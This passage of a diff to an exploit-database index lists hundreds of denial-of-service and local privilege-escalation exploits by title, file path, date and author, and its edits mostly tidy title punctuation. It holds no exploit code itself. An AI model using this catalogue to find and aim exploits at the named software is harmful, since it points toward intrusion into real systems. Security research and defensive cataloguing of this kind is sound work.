Language File Integer Overflow",2013-09-18,LiquidWorm,windows,dos,0 28380,platforms/linux/dos/28380.txt,"Mozilla Firefox 1.0.x - JavaScript Handler Race Condition Memory Corruption",2006-08-12,"Michal Zalewski",linux,dos,0 28381,platforms/windows/dos/28381.txt,"Microsoft Windows XP/2000/2003 help - Multiple Vulnerabilities",2006-08-12,"Benjamin Tobias Franz",windows,dos,0 28383,platforms/linux/dos/28383.txt,"ImageMagick 6.x - '.SGI' Image File Remote Heap Buffer Overflow",2006-08-14,"Damian Put",linux,dos,0 @@ -4512,7 +4513,7 @@ id,file,description,date,author,platform,type,port 36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 - ActiveX Control 'LicenseName()' Method Buffer Overflow",2012-02-06,"Senator of Pirates",windows,dos,0 36669,platforms/linux/dos/36669.txt,"Apache APR - Hash Collision Denial of Service",2012-01-05,"Moritz Muehlenhoff",linux,dos,0 36682,platforms/php/dos/36682.php,"PHP PDORow Object - Remote Denial of Service",2011-09-24,anonymous,php,dos,0 -36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 (x86) - (PoC)",2015-04-13,sleepya,linux,dos,0 +36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Serviec (PoC)",2015-04-13,sleepya,linux,dos,0 36743,platforms/linux/dos/36743.c,"Linux Kernel 3.13 / 3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service",2015-04-13,"Emeric Nasi",linux,dos,0 36773,platforms/windows/dos/36773.c,"Microsoft Windows - 'HTTP.sys' PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0 36776,platforms/windows/dos/36776.py,"Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80 @@ -4536,7 +4537,7 @@ id,file,description,date,author,platform,type,port 37053,platforms/multiple/dos/37053.c,"QEMU - Floppy Disk Controller (FDC) (PoC)",2015-05-18,"Marcus Meissner",multiple,dos,0 37061,platforms/multiple/dos/37061.txt,"Sony Bravia KDL-32CX525 - 'hping' Command Remote Denial of Service",2012-04-05,"Gabriel Menezes Nunes",multiple,dos,0 37068,platforms/windows/dos/37068.py,"ZOC SSH Client - Buffer Overflow (SEH)",2015-05-20,"Dolev Farhi",windows,dos,0 -37124,platforms/windows/dos/37124.txt,"Acoustica Pianissimo 1.0 Build 12 - (Registration ID) Buffer Overflow (PoC)",2015-05-26,LiquidWorm,windows,dos,0 +37124,platforms/windows/dos/37124.txt,"Acoustica Pianissimo 1.0 Build 12 - 'Registration ID' Buffer Overflow (PoC)",2015-05-26,LiquidWorm,windows,dos,0 37149,platforms/windows/dos/37149.py,"Private Shell SSH Client 3.3 - Crash (PoC)",2015-05-29,3unnym00n,windows,dos,22 37160,platforms/windows/dos/37160.pl,"Universal Reader 1.16.740.0 - 'uread.exe' Denial of Service",2012-05-14,demonalex,windows,dos,0 37187,platforms/windows/dos/37187.py,"Jildi FTP Client - Buffer Overflow (PoC)",2015-06-03,metacom,windows,dos,21 @@ -4904,7 +4905,7 @@ id,file,description,date,author,platform,type,port 39076,platforms/multiple/dos/39076.txt,"Wireshark infer_pkt_encap - Heap Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0 39077,platforms/multiple/dos/39077.txt,"Wireshark AirPDcapDecryptWPABroadcastKey - Heap Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0 39082,platforms/multiple/dos/39082.txt,"PHP 7.0.0 - Format String",2015-12-23,"Andrew Kramer",multiple,dos,0 -39091,platforms/php/dos/39091.pl,"WHMCS 5.12 - 'cart.php' Denial of Service",2014-02-07,Amir,php,dos,0 +39091,platforms/php/dos/39091.pl,"WHMCompleteSolution (WHMCS) 5.12 - 'cart.php' Denial of Service",2014-02-07,Amir,php,dos,0 39092,platforms/php/dos/39092.pl,"phpBB 3.0.8 - Remote Denial of Service",2014-02-11,Amir,php,dos,0 39103,platforms/windows/dos/39103.txt,"AccessDiver 4.301 - Buffer Overflow",2015-12-26,hyp3rlinx,windows,dos,0 39125,platforms/windows/dos/39125.html,"Kaspersky Internet Security - Remote Denial of Service",2014-03-20,CXsecurity,windows,dos,0 @@ -5404,7 +5405,7 @@ id,file,description,date,author,platform,type,port 222,platforms/linux/local/222.c,"gnome_segv - Local Buffer Overflow",2000-12-06,"Cody Tubbs",linux,local,0 229,platforms/linux/local/229.c,"xsoldier 0.96 (RedHat 6.2) - Exploit",2000-12-15,zorgon,linux,local,0 231,platforms/linux/local/231.sh,"Pine (Local Message Grabber) - Exploit",2000-12-15,mat,linux,local,0 -243,platforms/bsd/local/243.c,"BSD chpass - (pw_error(3)) Privilege Escalation",2001-01-12,caddis,bsd,local,0 +243,platforms/bsd/local/243.c,"BSD chpass - 'pw_error(3)' Privilege Escalation",2001-01-12,caddis,bsd,local,0 245,platforms/hp-ux/local/245.c,"HP-UX 11.0 - /bin/cu Privilege Escalation",2001-01-13,zorgon,hp-ux,local,0 247,platforms/solaris/local/247.c,"Solaris 2.5 / 2.5.1 - getgrnam() Local Overflow",2001-01-13,"Pablo Sor",solaris,local,0 249,platforms/linux/local/249.c,"GLIBC locale - Format Strings Exploit",2003-01-15,logikal,linux,local,0 @@ -5595,7 +5596,7 @@ id,file,description,date,author,platform,type,port 1173,platforms/windows/local/1173.c,"Mercora IMRadio 4.0.0.0 - Local Password Disclosure",2005-08-22,Kozan,windows,local,0 1174,platforms/windows/local/1174.c,"ZipTorrent 1.3.7.3 - Local Proxy Password Disclosure",2005-08-22,Kozan,windows,local,0 1181,platforms/linux/local/1181.c,"MySQL 4.0.17 (Linux) - User-Defined Function (UDF) Dynamic Library Exploit (1)",2004-12-24,"Marco Ivaldi",linux,local,0 -1182,platforms/solaris/local/1182.c,"Solaris 2.6/7/8/9 (sparc) - (ld.so.1) Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0 +1182,platforms/solaris/local/1182.c,"Solaris 2.6/7/8/9 (sparc) - 'ld.so.1' Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0 1185,platforms/osx/local/1185.pl,"Adobe Version Cue 1.0/1.0.1 (OSX) - Privilege Escalation",2005-08-30,vade79,osx,local,0 1186,platforms/osx/local/1186.c,"Adobe Version Cue 1.0/1.0.1 (OSX) - '-lib' Privilege Escalation",2005-08-30,vade79,osx,local,0 1187,platforms/linux/local/1187.c,"Gopher 3.0.9 - (+VIEWS) Remote Client-Side Buffer Overflow",2005-08-30,vade79,linux,local,0 @@ -5643,8 +5644,8 @@ id,file,description,date,author,platform,type,port 1584,platforms/windows/local/1584.cpp,"Microsoft Windows - Telephony Service Command Execution (MS05-040)",2006-03-14,"Cesar Cerrudo",windows,local,0 1591,platforms/linux/local/1591.py,"Python 2.4.2 - realpath() Local Stack Overflow",2006-03-18,"Gotfault Security",linux,local,0 1596,platforms/linux/local/1596.txt,"X.Org X11 (X11R6.9.0/X11R7.0) - Privilege Escalation",2006-03-20,"H D Moore",linux,local,0 -1624,platforms/tru64/local/1624.pl,"Tru64 UNIX 5.0 - (Rev. 910) rdist NLSPATH Buffer Overflow",2006-03-29,"Kevin Finisterre",tru64,local,0 -1625,platforms/tru64/local/1625.pl,"Tru64 UNIX 5.0 - (Rev. 910) edauth NLSPATH Buffer Overflow",2006-03-29,"Kevin Finisterre",tru64,local,0 +1624,platforms/tru64/local/1624.pl,"Tru64 UNIX 5.0 (Rev. 910) - rdist NLSPATH Buffer Overflow",2006-03-29,"Kevin Finisterre",tru64,local,0 +1625,platforms/tru64/local/1625.pl,"Tru64 UNIX 5.0 (Rev. 910) - edauth NLSPATH Buffer Overflow",2006-03-29,"Kevin Finisterre",tru64,local,0 1719,platforms/multiple/local/1719.txt,"Oracle 10g Release 2 - 'DBMS_EXPORT_EXTENSION' SQL Exploit",2006-04-26,N1V1Hd,multiple,local,0 1772,platforms/windows/local/1772.c,"Intel Wireless Service - 's24evmon.exe' Shared Memory Exploit",2006-05-09,"Ruben Santamarta",windows,local,0 1806,platforms/windows/local/1806.c,"IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (1)",2006-05-19,Devil-00,windows,local,0 @@ -5714,7 +5715,7 @@ id,file,description,date,author,platform,type,port 2676,platforms/windows/local/2676.cpp,"Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Exploit",2006-10-29,Nanika,windows,local,0 2737,platforms/osx/local/2737.pl,"Xcode OpenBase 10.0.0 (OSX) - (symlink) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0 2738,platforms/osx/local/2738.pl,"Xcode OpenBase 10.0.0 (OSX) - (unsafe system call) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0 -2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (OSX) - (libucache.dylib) Privilege Escalation",2006-11-15,"Kevin Finisterre",osx,local,0 +2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (OSX) - 'libucache.dylib' Privilege Escalation",2006-11-15,"Kevin Finisterre",osx,local,0 40380,platforms/windows/local/40380.py,"PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure",2016-09-14,"Yakir Wizman",windows,local,0 2815,platforms/windows/local/2815.c,"XMPlay 3.3.0.4 - (M3U Filename) Local Buffer Overflow",2006-11-20,"Greg Linares",windows,local,0 2824,platforms/windows/local/2824.c,"XMPlay 3.3.0.4 - (ASX Filename) Local Buffer Overflow",2006-11-21,"Greg Linares",windows,local,0 @@ -5752,7 +5753,7 @@ id,file,description,date,author,platform,type,port 3356,platforms/linux/local/3356.sh,"Nortel SSL VPN Linux Client 6.0.3 - Privilege Escalation",2007-02-21,"Jon Hart",linux,local,0 3369,platforms/windows/local/3369.pl,"News Rover 12.1 Rev 1 - Remote Stack Overflow (2)",2007-02-24,"Umesh Wanve",windows,local,0 3383,platforms/plan9/local/3383.c,"Plan 9 Kernel - 'devenv.c OTRUNC/pwrite' Local Exploit",2007-02-28,"Don Bailey",plan9,local,0 -3384,platforms/linux/local/3384.c,"Apache 1.3.33/1.3.34 (Ubuntu / Debian) - (CGI TTY) Privilege Escalation",2007-02-28,"Kristian Hermansen",linux,local,0 +3384,platforms/linux/local/3384.c,"Apache 1.3.33/1.3.34 (Ubuntu / Debian) - CGI TTY Privilege Escalation",2007-02-28,"Kristian Hermansen",linux,local,0 3386,platforms/osx/local/3386.pl,"McAfee VirusScan for Mac (Virex) 7.7 - Privilege Escalation",2007-02-28,"Kevin Finisterre",osx,local,0 3413,platforms/multiple/local/3413.php,"PHP < 4.4.5 / 5.2.1 - PHP_binary Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0 3414,platforms/multiple/local/3414.php,"PHP < 4.4.5 / 5.2.1 - WDDX Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0 @@ -5806,7 +5807,7 @@ id,file,description,date,author,platform,type,port 3811,platforms/windows/local/3811.c,"IrfanView 4.00 - '.iff' Buffer Overflow",2007-04-27,Marsu,windows,local,0 3812,platforms/windows/local/3812.c,"Photoshop CS2/CS3 / Paint Shop Pro 11.20 - '.png' Buffer Overflow",2007-04-27,Marsu,windows,local,0 3823,platforms/windows/local/3823.c,"Winamp 5.34 - '.mp4' Code Execution",2007-04-30,Marsu,windows,local,0 -3856,platforms/windows/local/3856.htm,"East Wind Software - (advdaudio.ocx 1.5.1.1) Local Buffer Overflow",2007-05-05,shinnai,windows,local,0 +3856,platforms/windows/local/3856.htm,"East Wind Software - 'advdaudio.ocx 1.5.1.1' Local Buffer Overflow",2007-05-05,shinnai,windows,local,0 3888,platforms/windows/local/3888.c,"GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",windows,local,0 3897,platforms/windows/local/3897.c,"eTrust AntiVirus Agent r8 - Local Privilege Elevation Exploit",2007-05-11,binagres,windows,local,0 3912,platforms/windows/local/3912.c,"Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow",2007-05-12,vade79,windows,local,0 @@ -5981,7 +5982,7 @@ id,file,description,date,author,platform,type,port 7727,platforms/windows/local/7727.pl,"Microsoft HTML Workshop 4.74 - Universal Buffer Overflow",2009-01-12,SkD,windows,local,0 7745,platforms/windows/local/7745.py,"VUPlayer 2.49 - '.asx' (Universal) Local Buffer Overflow",2009-01-13,Encrypt3d.M!nd,windows,local,0 7765,platforms/windows/local/7765.py,"OtsTurntables 1.00.027 - '.ofl' Local Stack Overflow",2009-01-14,suN8Hclf,windows,local,0 -7839,platforms/windows/local/7839.py,"Total Video Player 1.31 - (DefaultSkin.ini) Local Stack Overflow",2009-01-20,His0k4,windows,local,0 +7839,platforms/windows/local/7839.py,"Total Video Player 1.31 - 'DefaultSkin.ini' Local Stack Overflow",2009-01-20,His0k4,windows,local,0 7843,platforms/windows/local/7843.c,"Browser3D 3.5 - '.sfs' Local Stack Overflow (C)",2009-01-22,SimO-s0fT,windows,local,0 7848,platforms/windows/local/7848.pl,"Browser3D 3.5 - '.sfs' Local Stack Overflow (Perl)",2009-01-22,AlpHaNiX,windows,local,0 7853,platforms/windows/local/7853.pl,"Elecard MPEG Player - '.m3u' Local Stack Overflow",2009-01-25,AlpHaNiX,windows,local,0 @@ -6125,7 +6126,7 @@ id,file,description,date,author,platform,type,port 9097,platforms/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink Attack",2009-07-09,kingcope,multiple,local,0 9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro 8.02 - '.pdm' Local Buffer Overflow (SEH)",2009-07-10,His0k4,windows,local,0 9135,platforms/linux/local/9135.sh,"Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Privilege Escalation",2009-07-13,nofame,linux,local,0 -9136,platforms/windows/local/9136.pl,"Mp3-Nator 2.0 - (ListData.dat) Universal Buffer Overflow (SEH)",2009-07-13,"ThE g0bL!N",windows,local,0 +9136,platforms/windows/local/9136.pl,"Mp3-Nator 2.0 - 'ListData.dat' Universal Buffer Overflow (SEH)",2009-07-13,"ThE g0bL!N",windows,local,0 9142,platforms/windows/local/9142.c,"Live For Speed 2 Version Z - '.Mpr' Local Buffer Overflow",2009-07-14,n00b,windows,local,0 9146,platforms/windows/local/9146.pl,"Icarus 2.0 - '.ICP' Local Stack Overflow",2009-07-14,[0]x80->[H]4x²0r,windows,local,0 9148,platforms/windows/local/9148.py,"Live For Speed 2 Version Z - '.mpr' Buffer Overflow (SEH)",2009-07-14,His0k4,windows,local,0 @@ -6136,7 +6137,7 @@ id,file,description,date,author,platform,type,port 9186,platforms/windows/local/9186.pl,"Easy RM to MP3 Converter - '.m3u' Universal Stack Overflow",2009-07-17,Stack,windows,local,0 9190,platforms/windows/local/9190.pl,"htmldoc 1.8.27.1 - '.html' Universal Stack Overflow",2009-07-17,ksa04,windows,local,0 9191,platforms/linux/local/9191.txt,"Linux Kernel 2.6.30 < 2.6.30.1 / SELinux (RHEL 5) - Privilege Escalation",2009-07-17,spender,linux,local,0 -9199,platforms/windows/local/9199.txt,"Adobe 9.x Related Service - (getPlus_HelperSvc.exe) Privilege Escalation",2009-07-20,Nine:Situations:Group,windows,local,0 +9199,platforms/windows/local/9199.txt,"Adobe 9.x Related Service - 'getPlus_HelperSvc.exe' Privilege Escalation",2009-07-20,Nine:Situations:Group,windows,local,0 9207,platforms/linux/local/9207.sh,"PulseAudio setuid - Privilege Escalation",2009-07-20,anonymous,linux,local,0 9208,platforms/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Privilege Escalation",2009-07-20,anonymous,linux,local,0 9215,platforms/windows/local/9215.pl,"Streaming Audio Player 0.9 - (skin) Local Stack Overflow (SEH)",2009-07-20,SkuLL-HackeR,windows,local,0 @@ -6170,9 +6171,9 @@ id,file,description,date,author,platform,type,port 9379,platforms/windows/local/9379.pl,"Playlistmaker 1.5 - '.m3u' / '.M3L' Local Stack Overflow (SEH)",2009-08-06,germaya_x,windows,local,0 9386,platforms/windows/local/9386.txt,"Steam 54/894 - Privilege Escalation",2009-08-07,MrDoug,windows,local,0 9409,platforms/windows/local/9409.pl,"Mediacoder 0.7.1.4490 - '.lst' / '.m3u' Universal Buffer Overflow (SEH)",2009-08-10,hack4love,windows,local,0 -9412,platforms/windows/local/9412.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (1)",2009-08-11,ahwak2000,windows,local,0 -9418,platforms/windows/local/9418.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (2)",2009-08-11,"ThE g0bL!N",windows,local,0 -9420,platforms/windows/local/9420.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (3)",2009-08-12,hack4love,windows,local,0 +9412,platforms/windows/local/9412.pl,"Easy Music Player 1.0.0.2 - 'wav' Universal Local Buffer Exploit (SEH) (1)",2009-08-11,ahwak2000,windows,local,0 +9418,platforms/windows/local/9418.pl,"Easy Music Player 1.0.0.2 - 'wav' Universal Local Buffer Exploit (SEH) (2)",2009-08-11,"ThE g0bL!N",windows,local,0 +9420,platforms/windows/local/9420.pl,"Easy Music Player 1.0.0.2 - 'wav' Universal Local Buffer Exploit (SEH) (3)",2009-08-12,hack4love,windows,local,0 9426,platforms/windows/local/9426.java,"FTPShell Client 4.1 RC2 - Name Session Stack Overflow",2009-08-13,zec,windows,local,0 9428,platforms/windows/local/9428.pl,"pIPL 2.5.0 - '.PLS' / '.PL' Universal Local Buffer Exploit (SEH)",2009-08-13,hack4love,windows,local,0 9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x (RedHat) - 'sock_sendpage()' Ring0 Privilege Escalation (1)",2009-08-14,spender,linux,local,0 @@ -6203,12 +6204,12 @@ id,file,description,date,author,platform,type,port 9550,platforms/windows/local/9550.txt,"Hex Workshop 4.23/5.1/6.0 - '.hex' Universal Local Buffer Overflows (SEH)",2009-08-31,hack4love,windows,local,0 9551,platforms/windows/local/9551.py,"Media Jukebox 8 - '.pls' Universal Local Buffer Exploit (SEH)",2009-08-31,mr_me,windows,local,0 9560,platforms/windows/local/9560.txt,"Soritong MP3 Player 1.0 - '.m3u' / UI.txt Universal Local Buffer Overflows",2009-09-01,hack4love,windows,local,0 -9567,platforms/windows/local/9567.pl,"Hamster Audio Player 0.3a - (Associations.cfg) Local Buffer Exploit (SEH) (1)",2009-09-01,"ThE g0bL!N",windows,local,0 +9567,platforms/windows/local/9567.pl,"Hamster Audio Player 0.3a - 'Associations.cfg' Local Buffer Exploit (SEH) (1)",2009-09-01,"ThE g0bL!N",windows,local,0 9568,platforms/windows/local/9568.py,"akPlayer 1.9.0 - '.plt' Universal Buffer Overflow (SEH)",2009-09-01,TiGeR-Dz,windows,local,0 9574,platforms/linux/local/9574.txt,"Linux Kernel < 2.6.19 (x86/x64) - 'udp_sendmsg' Privilege Escalation (2)",2009-09-02,spender,linux,local,0 9575,platforms/linux/local/9575.c,"Linux Kernel < 2.6.19 (Debian 4) - 'udp_sendmsg' Privilege Escalation (3)",2009-09-02,Andi,linux,local,0 9579,platforms/windows/local/9579.txt,"Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 - Collab getIcon Universal Exploit",2009-09-03,kralor,windows,local,0 -9580,platforms/windows/local/9580.pl,"Hamster Audio Player 0.3a - (Associations.cfg) Local Buffer Exploit (SEH) (2)",2009-09-03,hack4love,windows,local,0 +9580,platforms/windows/local/9580.pl,"Hamster Audio Player 0.3a - 'Associations.cfg' Local Buffer Exploit (SEH) (2)",2009-09-03,hack4love,windows,local,0 9581,platforms/windows/local/9581.pl,"SAP Player 0.9 - '.m3u' Universal Local Buffer Overflow (SEH)",2009-09-03,PLATEN,windows,local,0 9589,platforms/windows/local/9589.pl,"OtsTurntables 1.00.027 - '.m3u' / '.ofl' Local Universal Buffer Overflow (SEH)",2009-09-04,hack4love,windows,local,0 9595,platforms/linux/local/9595.c,"HTMLDOC 1.8.27 - (html File Handling) Stack Buffer Overflow",2009-09-09,"Pankaj Kohli",linux,local,0 @@ -6243,7 +6244,6 @@ id,file,description,date,author,platform,type,port 9895,platforms/windows/local/9895.txt,"Millenium MP3 Studio 2.0 - (mpf) Buffer Overflow",2009-10-14,dellnull,windows,local,0 9955,platforms/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 - Privilege Escalation",2009-10-20,trompele,hardware,local,0 9970,platforms/windows/local/9970.txt,"South River Technologies WebDrive 9.02 build 2232 - Privilege Escalation",2009-10-20,bellick,windows,local,0 -9971,platforms/windows/local/9971.php,"Spider Solitaire - (PoC)",2009-10-15,SirGod,windows,local,0 9973,platforms/multiple/local/9973.sh,"Sun VirtualBox 3.0.6 - Privilege Escalation",2009-10-17,prdelka,multiple,local,0 9974,platforms/windows/local/9974.pl,"AIMP2 Audio Converter - Playlist (SEH)",2009-11-16,corelanc0d3r,windows,local,0 9983,platforms/windows/local/9983.pl,"Xion Audio Player 1.0 121 - '.m3u' Buffer Overflow (2)",2009-10-16,"Dragon Rider",windows,local,0 @@ -6426,7 +6426,7 @@ id,file,description,date,author,platform,type,port 12261,platforms/windows/local/12261.rb,"Archive Searcher - '.zip' Stack Overflow",2010-04-16,Lincoln,windows,local,0 12293,platforms/windows/local/12293.py,"TweakFS 1.0 - (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0 12326,platforms/windows/local/12326.py,"ZipGenius 6.3.1.2552 - 'zgtips.dll' Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local,0 -12342,platforms/windows/local/12342.pl,"EDraw Flowchart ActiveX Control 2.3 - (.edd parsing) Remote Buffer Overflow (PoC)",2010-04-22,LiquidWorm,windows,local,0 +12342,platforms/windows/local/12342.pl,"EDraw Flowchart ActiveX Control 2.3 - '.edd parsing' Remote Buffer Overflow (PoC)",2010-04-22,LiquidWorm,windows,local,0 12368,platforms/windows/local/12368.pl,"ZipWrangler 1.20 - '.zip' SEH Exploit",2010-04-24,"TecR0c and Sud0",windows,local,0 12379,platforms/windows/local/12379.php,"Easyzip 2000 3.5 - '.zip' Stack Buffer Overflow (PoC)",2010-04-25,mr_me,windows,local,0 12388,platforms/windows/local/12388.rb,"WM Downloader 3.0.0.9 - Buffer Overflow (Metasploit)",2010-04-25,blake,windows,local,0 @@ -6782,7 +6782,7 @@ id,file,description,date,author,platform,type,port 17083,platforms/linux/local/17083.pl,"HT Editor 2.0.18 - File Opening Stack Overflow",2011-03-30,ZadYree,linux,local,0 17086,platforms/windows/local/17086.pl,"Word List Builder - Buffer Overflow (SEH)",2011-04-01,h1ch4m,windows,local,0 17124,platforms/windows/local/17124.pl,"MPlayer (r33064 Lite) - Buffer Overflow + ROP Exploit",2011-04-06,Nate_M,windows,local,0 -17196,platforms/windows/local/17196.html,"Gesytec ElonFmt ActiveX 1.1.14 - (ElonFmt.ocx) pid Item Buffer Overflow (SEH)",2011-04-21,LiquidWorm,windows,local,0 +17196,platforms/windows/local/17196.html,"Gesytec ElonFmt ActiveX 1.1.14 - 'ElonFmt.ocx' pid Item Buffer Overflow (SEH)",2011-04-21,LiquidWorm,windows,local,0 17144,platforms/windows/local/17144.pl,"MikeyZip 1.1 - '.zip' Buffer Overflow",2011-04-10,"C4SS!0 G0M3S",windows,local,0 17147,platforms/linux/local/17147.txt,"tmux 1.3/1.4 - '-S' Option Incorrect SetGID Privilege Escalation",2011-04-11,ph0x90bic,linux,local,0 17150,platforms/windows/local/17150.rb,"AOL Desktop 9.6 - RTX Buffer Overflow (Metasploit)",2011-04-08,Metasploit,windows,local,0 @@ -6896,7 +6896,7 @@ id,file,description,date,author,platform,type,port 18184,platforms/windows/local/18184.rb,"Final Draft 8 - Multiple Stack Buffer Overflows (Metasploit)",2011-12-01,"Nick Freeman",windows,local,0 18186,platforms/windows/local/18186.rb,"StoryBoard Quick 6 - Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",windows,local,0 18195,platforms/windows/local/18195.rb,"CCMPlayer 1.5 - '.m3u' Stack based Buffer Overflow (Metasploit)",2011-12-03,Metasploit,windows,local,0 -18201,platforms/windows/local/18201.txt,"SopCast 3.4.7 - (Diagnose.exe) Improper Permissions",2011-12-05,LiquidWorm,windows,local,0 +18201,platforms/windows/local/18201.txt,"SopCast 3.4.7 - 'Diagnose.exe' Improper Permissions",2011-12-05,LiquidWorm,windows,local,0 18228,platforms/linux/local/18228.sh,"Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Boundary Crossing Privilege Escalation",2011-12-10,otr,linux,local,0 18258,platforms/windows/local/18258.c,"TORCS 1.3.1 - acc Buffer Overflow",2011-12-20,"Andrés Gómez",windows,local,0 18334,platforms/windows/local/18334.py,"Microsoft Office 2003 Home/Pro - Code Execution (MS10-087)",2012-01-08,"b33f & g11tch",windows,local,0 @@ -8138,7 +8138,7 @@ id,file,description,date,author,platform,type,port 30604,platforms/linux/local/30604.c,"Linux Kernel 2.6.x - Ptrace Privilege Escalation",2007-09-21,"Wojciech Purczynski",linux,local,0 30605,platforms/linux/local/30605.c,"Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure",2007-09-21,Karimo_DM,linux,local,0 30620,platforms/linux/local/30620.txt,"Xen 3.0.3 - pygrub TOOLS/PYGRUB/SRC/GRUBCONF.PY Local Command Injection",2007-09-22,"Joris van Rantwijk",linux,local,0 -30666,platforms/multiple/local/30666.txt,"ACE Stream Media 2.1 - (acestream://) Format String (PoC)",2014-01-03,LiquidWorm,multiple,local,0 +30666,platforms/multiple/local/30666.txt,"ACE Stream Media 2.1 - 'acestream://' Format String (PoC)",2014-01-03,LiquidWorm,multiple,local,0 30680,platforms/windows/local/30680.txt,"Macrovision SafeDisc - 'SecDRV.SYS' Method_Neither Privilege Escalation",2007-10-18,"Elia Florio",windows,local,0 30681,platforms/windows/local/30681.txt,"SpeedFan - 'Speedfan.sys' Privilege Escalation",2007-10-18,"Ruben Santamarta",windows,local,0 30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 - Responder Privilege Escalation",2007-11-20,"Andrew Christensen",linux,local,0 @@ -8170,7 +8170,7 @@ id,file,description,date,author,platform,type,port 31959,platforms/linux/local/31959.txt,"Perl - 'rmtree()' Function Local Insecure Permissions",2008-06-23,"Frans Pop",linux,local,0 40349,platforms/windows/local/40349.py,"LogMeIn Client 1.3.2462 (x64) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",windows,local,0 31972,platforms/windows/local/31972.py,"Gold MP4 Player 3.3 - Buffer Overflow (SEH)",2014-02-28,metacom,windows,local,0 -31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 - (Settings.ini) Buffer Overflow (SEH) (Metasploit)",2014-02-28,Metasploit,windows,local,0 +31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 - 'Settings.ini' Buffer Overflow (SEH) (Metasploit)",2014-02-28,Metasploit,windows,local,0 31991,platforms/windows/local/31991.rb,"VCDGear 3.50 - '.cue' Stack Buffer Overflow",2014-02-28,Provensec,windows,local,0 32041,platforms/windows/local/32041.pl,"ALLPlayer 5.8.1 - '.m3u' Buffer Overflow (SEH)",2014-03-03,"Gabor Seljan",windows,local,0 32050,platforms/windows/local/32050.py,"Calavera UpLoader 3.5 - Buffer Overflow (SEH)",2014-03-04,"Daniel la calavera",windows,local,0 @@ -8318,8 +8318,8 @@ id,file,description,date,author,platform,type,port 35741,platforms/windows/local/35741.pl,"Palringo 2.8.1 - Stack Buffer Overflow (PoC)",2015-01-10,Mr.ALmfL9,windows,local,0 35742,platforms/osx/local/35742.c,"Apple Mac OSX 10.9.x - sysmond XPC Privilege Escalation",2015-01-10,"Google Security Research",osx,local,0 35746,platforms/linux/local/35746.sh,"RedStar 3.0 Desktop - (Enable sudo) Privilege Escalation",2015-01-11,"prdelka & sfan55",linux,local,0 -35748,platforms/linux/local/35748.txt,"RedStar 2.0 Desktop - (World-writeable rc.sysinit) Privilege Escalation",2015-01-11,prdelka,linux,local,0 -35749,platforms/linux/local/35749.txt,"RedStar 3.0 Desktop - (Software Manager swmng.app) Privilege Escalation",2015-01-11,RichardG,linux,local,0 +35748,platforms/linux/local/35748.txt,"RedStar 2.0 Desktop - 'World-writeable rc.sysinit' Privilege Escalation",2015-01-11,prdelka,linux,local,0 +35749,platforms/linux/local/35749.txt,"RedStar 3.0 Desktop - 'Software Manager swmng.app' Privilege Escalation",2015-01-11,RichardG,linux,local,0 35811,platforms/windows/local/35811.txt,"Microsoft Windows < 8.1 (x86/x64) - (User Profile Service) Privilege Escalation (MS15-003)",2015-01-18,"Google Security Research",windows,local,0 35812,platforms/windows/local/35812.py,"T-Mobile Internet Manager - Buffer Overflow (SEH)",2015-01-18,metacom,windows,local,0 35813,platforms/windows/local/35813.py,"Congstar Internet Manager - Buffer Overflow (SEH)",2015-01-18,metacom,windows,local,0 @@ -8435,7 +8435,7 @@ id,file,description,date,author,platform,type,port 37771,platforms/windows/local/37771.py,"Microsoft HTML Help Compiler 4.74.8702.0 - SEH Based Overflow",2015-08-15,St0rn,windows,local,0 37772,platforms/multiple/local/37772.js,"Mozilla Firefox < 39.03 - 'pdf.js' Same Origin Policy Exploit",2015-08-15,"Tantaryu MING",multiple,local,0 37780,platforms/windows/local/37780.c,"ThinPrint - 'tpfc.dll' Insecure Library Loading Arbitrary Code Execution",2012-09-04,"Moshe Zioni",windows,local,0 -37799,platforms/windows/local/37799.py,"MASM321 11 Quick Editor - (.qeditor) 4.0g- .qse SEH Based Buffer Overflow (ASLR & SAFESEH Bypass)",2015-08-17,St0rn,windows,local,0 +37799,platforms/windows/local/37799.py,"MASM321 11 Quick Editor - '.qeditor' 4.0g 